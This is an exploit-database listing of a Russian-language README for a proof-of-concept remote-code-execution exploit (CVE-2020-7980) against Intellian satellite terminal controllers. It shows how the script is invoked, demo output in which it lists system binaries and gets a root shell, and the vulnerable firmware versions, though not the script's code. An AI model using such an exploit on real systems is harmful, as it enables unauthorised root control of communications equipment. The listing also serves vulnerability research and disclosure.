Sploitus

Exploit for Satellian

kitploit · 2026-08-30

Exploit Code

MARKDOWN40 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-XH4H-SATELLIAN-CVE-2020-7980
# Satellian-CVE-2020-7980

Satellian — это PoC-скрипт, демонстрирующий уязвимость удалённого выполнения кода (RCE) в контроллере спутниковой связи Intellian (Intellian Aptus Web).

Следующий скрипт попытается вывести список всех бинарных файлов в системе, а затем позволит тестировщику напрямую взаимодействовать с сервером (обычно с правами root).

# PoC

root@kitploit:~
    
    
    xh4h@Macbook-xh4h ~/Satellian> python satellian.py -u http://<redacted>
                      ________________________________________
             (__)    /                                        \
             (oo)   (     Intellian Satellite Terminal PoC     )
      /-------\/ --' \________________________________________/ 
     / |     ||
    *  ||----||             
    
    Performing initial scan. Listing available system binaries.
    Starting request to http://<redacted>
    Executing command /bin/ls /bin
    acu_server
    acu_tool
    addgroup
    adduser
    ...
    
    Satellian $ id
    uid=0(root) gid=0(root)
    

# Протестированные версии

Intellian v1.12, v1.21, v1.24.

# Отказ от ответственности

Вся информация в этом репозитории предоставлена исключительно в образовательных целях. Автор репозитория никоим образом не несёт ответственности за любое неправомерное использование этой информации. Этот скрипт является всего лишь доказательством концепции и никоим образом не был разработан для вредоносной деятельности.